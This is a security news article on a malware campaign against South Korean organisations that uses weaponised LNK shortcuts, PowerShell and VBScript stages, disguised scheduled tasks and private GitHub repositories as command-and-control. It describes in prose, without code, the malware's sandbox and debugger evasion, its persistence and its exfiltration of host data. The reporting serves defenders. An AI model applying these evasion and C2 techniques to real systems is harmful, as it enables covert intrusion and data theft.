Hackers are increasingly exploiting Windows shortcut files and GitHub in a sophisticated, multi-stage malware campaign aimed at organizations in South Korea. This operation strategically utilizes LNK files, PowerShell scripting, and GitHub APIs to deploy surveillance tools while seamlessly blending into normal enterprise network traffic.
The initial phase of this campaign begins with weaponized LNK files. Unlike traditional shortcuts, these files contain hidden scripts designed to initiate malicious actions when executed. Early samples of this malware showcased rich metadata, revealing recurring patterns including file names, sizes, and labels indicating “Hangul Document” files. These indicators have often been associated with North Korean-affiliated hacking groups like Kimsuky, APT37, and Lazarus.
Over time, the cybercriminals behind this operation have enhanced their toolkit, incorporating simplistic decoding functions and hard-coding payloads directly into the LNK file arguments. When unsuspecting victims open a deceptive PDF file, seemingly aligned with legitimate Korean business themes, a PowerShell script executes silently in the background, allowing the attackers to maintain stealth.
Previous iterations of this campaign, observed as early as 2024, utilized basic string concatenation methods to obscure a GitHub command and control (C2) URL and an access token, according to FortiGuard Labs. This tactic allowed the attackers to leverage GitHub for command execution while maintaining the appearance of normal, encrypted activity associated with GitHub usage, making it harder for corporate networks to detect such communication.
The PowerShell script within the LNK files takes precautions against detection when executed. It performs a scan for virtualization, debugging, and forensic tools such as VMware, VirtualBox, and Wireshark. If any of these tools are detected, the script exits immediately, effectively blocking any analysis and ensuring that subsequent stages remain hidden from cybersecurity experts. In the absence of detection, the script reconstructs Base64-encoded strings, creating a VBScript payload stored in a randomly named directory under the %Temp% variable.
To prolong its survival, the malware registers a concealed Scheduled Task that runs the VBScript every thirty minutes. This task uses an elaborate name, resembling a standard document title to further obscure its malicious intentions. More recent variants of the malware have stripped away nearly all identifying metadata but continue to hold a decoder capable of unpacking both a decoy PDF and the next stage of the PowerShell script.
This VBScript responds by relaunching the PowerShell payload within a hidden window, guaranteeing continued execution without user visibility. The script also gathers crucial host data, such as the operating system version, build, last boot time, and a list of active processes. This information is logged and subsequently uploaded to a targeted GitHub repository using a hardcoded access token.
Researchers have traced these uploads back to a GitHub user named “motoralis,” whose private repositories coincided with spikes in LNK-based phishing activities observed since 2025. Additionally, other usernames such as God0808RAMA, Pigresy80, and pandora0009, suggest a broader network of dormant and newly activated accounts utilized by the attack infrastructure. Some accounts remain inactive for extended periods, while others activate at intervals, creating a resilient C2 layer that can withstand takedown attempts.
The security implications of using GitHub in these attacks are significant. Since all payloads and logs are securely stored in private repositories, defenders lack direct access to monitor the contents. Nevertheless, the malware traffic is indistinguishable from regular encrypted GitHub activity, which is often permitted in corporate settings.
This approach exemplifies a broader trend in which threat actors exploit trusted public platforms—ranging from software development tools to file-sharing services—to host malware and exfiltrate sensitive information while evading both URL and domain-based blocking measures.
As the operation progresses to the third stage, a simplified PowerShell component maintains an active connection to the GitHub-hosted C2. This module routinely pulls commands or additional payloads from a designated raw file path within the motoralis repository, utilizing the previously established Scheduled Task as its operational heartbeat. A dedicated “keep-alive” script collects real-time network configuration data and sends it back to the GitHub repository, filing logs with a date and timestamp in a specified format.
By chaining together LNK shortcuts, native Windows scripts (including PowerShell and VBScript), Scheduled Tasks, and GitHub APIs, these attackers evade traditional executable malware detectors while significantly reducing their on-disk footprint. Security teams are advised to approach unexpected LNK and document files with heightened caution, enhance monitoring of PowerShell and wscript activities, and establish baseline GitHub usage metrics to identify any unusual API calls or access behaviors.